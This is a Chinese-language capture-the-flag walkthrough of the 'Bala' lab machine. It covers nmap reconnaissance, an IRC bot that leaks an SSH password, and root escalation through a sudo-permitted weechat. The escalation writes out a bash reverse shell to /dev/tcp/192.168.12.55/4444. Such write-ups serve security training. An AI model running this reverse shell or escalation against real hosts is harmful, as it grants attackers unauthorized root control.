信息收集

┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.12.142  08:00:27:64:30:cb       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.12.142

┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 21:10 CST
Nmap scan report for 192.168.12.142
Host is up (0.00059s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: IRC\xE9\x80\x9A\xE4\xBF\xA1\xE5\x8D\x8F\xE8\xAE\xAE - \xE6\x9A\x97\xE9\xBB\x91\xE4\xB8\xBB\xE9\xA2\x98
6667/tcp open  irc
| irc-info: 
|   users: 2
|   servers: 1
|   chans: 4
|   lusers: 2
|   lservers: 0
|   server: irc.local
|   version: InspIRCd-3. irc.local 
|   source ident: nmap
|   source host: 192.168.12.55
|_  error: Closing link: (nmap@192.168.12.55) [Client exited]
MAC Address: 08:00:27:64:30:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: irc.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.58 ms 192.168.12.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.02 seconds

6667 端口开了个 InspIRCd 服务，用 HexChat 连接：

像这样设置好之后 Connect 就行

在弹出的窗口中勾选 Open the channel list. 看看有哪些频道

然后逐个加入看看

刚登进来拿到这些信息：

然后在左边四个频道逐个查看，发现每个频道的管理员都是 bala，和 bala 私聊：

<root> 111
<bala> 未知命令，可用命令: getpassword, help, info
<root> getpassword
<bala> 密码: ai01ClGAXoYpeevwNMS1
<bala> 此密码为敏感信息，请妥善保管
<root> help
<bala> 可用命令:
<bala> getpassword - 获取密码
<bala> help - 显示帮助
<bala> info - 机器人信息
* DCC CHAT '' to bala timed out, aborting.
<root> info
<bala> Simple IRC Bot v2.0
<bala> 功能: 密码管理、频道通信

密码猜测是 SSH 的密钥，刚登进来时拿到的 fzer 很可疑，猜测是用户名，尝试登录：

┌──(root㉿kali)-[~]
└─# ssh fzer@$IP
The authenticity of host '192.168.12.142 (192.168.12.142)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:2: [hashed name]
    ~/.ssh/known_hosts:4: [hashed name]
    ~/.ssh/known_hosts:5: [hashed name]
    ~/.ssh/known_hosts:12: [hashed name]
    ~/.ssh/known_hosts:13: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.12.142' (ED25519) to the list of known hosts.
fzer@192.168.12.142's password: 
Linux Bala 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Nov  7 11:31:34 2025 from 192.168.12.55
fzer@Bala:~$ id
uid=1000(fzer) gid=1000(fzer) groups=1000(fzer)

提权

列出当前用户允许通过 sudo 执行的命令

fzer@Bala:~$ sudo -l
[sudo] password for fzer: 
Matching Defaults entries for fzer on Bala:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fzer may run the following commands on Bala:
    (ALL) PASSWD: /usr/bin/weechat

weechat 是一个命令行界面的 IRC 客户端，用 sudo /usr/bin/weechat 进入

运行 /exec -o /bin/bash 没回显，试试看反弹 shell

1	/exec bash -c 'bash -i >& /dev/tcp/192.168.12.55/4444 0>&1'

成功拿到 root shell

Bala[MazeSec]

信息收集

提权